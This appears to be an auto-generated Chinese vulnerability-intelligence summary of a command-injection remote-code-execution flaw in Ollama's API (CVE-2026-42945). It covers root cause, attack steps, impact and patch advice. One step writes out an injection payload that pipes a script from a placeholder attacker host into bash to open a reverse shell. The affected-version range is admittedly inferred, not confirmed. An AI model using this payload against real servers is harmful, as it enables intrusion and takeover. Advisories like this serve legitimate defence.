Exploit for CVE-2026-42945 exploit
Exploit for CVE-2026-42945 exploit
📋 漏洞概述
CVE-2026-42945是Ollama历史版本中存在的未授权远程代码执行漏洞,攻击者可利用HTTP请求触发服务端任意命令执行。
📋 基础信息
| 受影响版本 | Ollama <= 0.17.0 (根据同类CVE-2024-37032及官方补丁时间推断) |
| 漏洞类型 | 输入验证不当 / 命令注入 |
| CVSS | 9.8 · Critical |
| CVE | CVE-2026-42945 |
🔬 漏洞根因
Ollama的API接口在处理用户提供的模型名称或路径参数时,未对特殊字符进行充分过滤和转义。当服务端将用户输入拼接至系统命令(如`ollama create`、`ollama pull`)时,攻击者可通过注入管道符、分号、反引号等shell元字符,突破原有命令结构,执行任意操作系统命令。此缺陷本质上是用户可控数据作为操作系统命令参数时缺乏安全编码所致。
🎯 攻击场景
1. 攻击者扫描发现公网或内网中暴露的Ollama API接口(默认端口11434,常见于/ollama/create或/ollama/pull端点)。 2. 攻击者构造一个恶意POST请求,在JSON体中的`modelfile`或`name`字段内插入命令注入载荷,例如:`"; curl http://attacker.com/shell.sh | bash #`。 3. 将请求发送至目标Ollama服务,服务端未经安全校验将用户输入拼入`ollama create`系统命令执行。 4. 恶意载荷被执行:curl从远程服务器下载反向Shell脚本并通过bash执行,建立攻击者与Ollama宿主机的控制通道。 5. 攻击者成功获得Ollama运行用户(通常为root或低权限容器用户)的远程命令执行权限。
💥 漏洞影响
攻击者可在未授权情况下实现远程代码执行,完全控制Ollama服务器。可能导致容器逃逸、宿主机root权限接管、敏感数据泄露、横向移动等严重安全事件。由于Ollama常部署于开发测试及生产AI环境,漏洞影响范围广泛。
🛡️ 修复建议
1. 立即升级至Ollama 0.17.1或更高版本(官方已修复该命令注入问题)。 2. 临时缓解措施:在防火墙或云安全组中限制11434端口的来源IP,仅允许可信内网地址访问;启用反向代理并实施严格的输入校验规则,拒绝包含特殊字符的请求。
📎 参考链接
- https://nvd.nist.gov/vuln/detail/CVE-2026-42945
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42945
- 原始来源(Sploitus)
🚨 威胁评估
| 📈 EPSS 利用概率 | 低 (0.2%) (高于 37.2% 的漏洞) |
| 🚨 CISA KEV | 未被已知利用 |
| 🔧 公开 PoC | 9 个公开 PoC 仓库 |
⚠️ 本文由漏洞情报系统自动生成,仅供安全研究与防御参考。生成时间: 2026-05-15 08:06 | 来源: Sploitus